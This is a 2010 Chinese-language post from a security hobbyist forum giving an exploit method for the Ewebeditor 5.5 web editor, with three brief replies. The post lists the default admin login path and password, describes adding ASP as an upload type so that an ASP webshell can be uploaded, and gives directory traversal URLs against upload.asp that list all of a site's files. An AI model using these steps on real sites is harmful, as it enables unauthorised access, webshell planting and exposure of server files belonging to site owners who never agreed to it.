标题: Ewebeditor 5.5 列目录漏洞利用方法 [打印本页]

---

作者: hyrz    时间: 2010-6-22 14:51     标题: Ewebeditor 5.5 列目录漏洞利用方法

发布时间：2010-01-11

影响版本：Ewebeditor 5.5

发布作者：udb311 from 黑白前线

漏洞描述：

利用方法1：

后台登录：ewebeditor5.5 默认后台/admin/ewebeditor/admin/login.asp 默认密码admin

添加上传类型asp，调用用样式上传页ewebeditor/ewebeditor.htm?id=body&style=popup直接上传asp大马。



利用方法2：

进入后台，ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../一级跳转目录

ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../../二级跳转目录

可遍历网站所有目录文件。

---

作者: qnbs1    时间: 2010-6-23 09:10

这个我看过

---

作者: qnbs1    时间: 2010-6-23 09:15

这个我看过

---

作者: MonsT.R-凌乱    时间: 2010-6-24 00:24

5.5版本还没见过了
有待测试

---

欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)

Powered by Discuz! 7.2